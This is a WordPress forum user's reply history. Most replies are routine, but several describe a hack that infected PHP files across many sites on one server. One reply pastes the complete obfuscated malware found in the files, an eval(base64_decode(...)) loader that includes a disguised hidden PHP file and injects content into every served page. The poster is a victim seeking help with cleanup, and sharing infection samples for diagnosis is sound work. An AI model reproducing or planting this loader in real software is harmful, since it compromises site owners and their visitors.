coolgeee

Forum Replies Created

Viewing 15 replies - 1 through 15 (of 29 total)
  • Forum: Plugins
    In reply to: Survey with Multiple Steps

    Don’t know any plugins like that…but really like your work!

    It happened when I upgraded and I think I did not copy a file correctly, or the pathway was defined.

    It only happened with one of my themes.

    I will post if I figure it out.

    Thread Starter coolgeee

    (@coolgeee)

    ok, thanks Mike. I appreciate it.

    It is just the weirdest thing. If you visit the site I listed and use a dummy email to join the newsletter, as it is adding you look at the bottom of your browser and you will see that it is referencing some uk db and my wordpress db as well.

    I just thought it was very odd.

    Thanks again.

    BTW, I really appreciate your contact form. I am also working on some big projects here in the NYC area. Maybe we can chat sometime?

    I second that. I use fast and secure contact form and it works great.

    Mike is the Man!

    Mike, I just posted something here about a newsletter plugin. Can you review and comment please.

    Thanks

    I am still wondering how the hack happened?

    same server

    I uninstalled about 10 sites already.

    3 sites I really do not want to lose, so I am coping them to my harddrive and then I will manually delete all corrupt files.

    Any easier way?

    bump

    anyone else have this issue

    It totally infected every php file across 15 domains!

    All these files aslos had added code to it.

    wp-pass.php
    wp-commentsrss2.php

    my wp-pass.php:
    <?php
    /**
    * Creates the password cookie and redirects back to where the
    * visitor was before.
    *
    * @package WordPress
    */

    /** Make sure that the WordPress bootstrap has ran before continuing. */
    require( dirname(__FILE__) . ‘/wp-load.php’);

    if ( get_magic_quotes_gpc() )
    $_POST[‘post_password’] = stripslashes($_POST[‘post_password’]);

    // 10 days
    setcookie(‘wp-postpass_’ . COOKIEHASH, $_POST[‘post_password’], time() + 864000, COOKIEPATH);

    wp_safe_redirect(wp_get_referer());
    ?>

    this is what my php.ini looks like:
    register_globals = off
    allow_url_fopen = off

    expose_php = Off
    max_input_time = 60
    variables_order = “EGPCS”
    extension_dir = ./
    upload_tmp_dir = /tmp
    precision = 12
    SMTP = relay-hosting.secureserver.net
    url_rewriter.tags = “a=href,area=href,frame=src,input=src,form=,fieldset=”

    [Zend]
    zend_extension=/usr/local/zo/ZendExtensionManager.so
    zend_extension=/usr/local/zo/4_3/ZendOptimizer.so

    does this look corrupt?

    thanks

    I will update any findings shortly

    Forum: Fixing WordPress
    In reply to: Serious hackage!!!
    Thread Starter coolgeee

    (@coolgeee)

    thanks

    I appears that every single wordpress site I had has been affected.

    I might have to contact host and ask to roll back.

    I will check the link

    example:
    in the wp-app.php file here is the code: (it is in all the files!!!

    <? /**/eval(base64_decode(‘aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9jb250ZW50L2cvbC9vL2dsb2JhbGJpendvcmtzL2h0bWwvaW5mb3JtZWRueS9UaGVtZXMvZGVmYXVsdC9pbWFnZXMvcG9zdC9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvY29udGVudC9nL2wvby9nbG9iYWxiaXp3b3Jrcy9odG1sL2luZm9ybWVkbnkvVGhlbWVzL2RlZmF1bHQvaW1hZ2VzL3Bvc3Qvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19’)); ?>

    I am checking now.

    But I do notice that almost all my file have this code added to the beginning of the files, like index.php, etc

    <? /**/eval(base64_decode… ?>

    I found this code added to many of my files. I am uninstalling many of the sites now and going to older backups.

    Almost all of my wordpress sites on the same server has been attacked with this.

    thanks

Viewing 15 replies - 1 through 15 (of 29 total)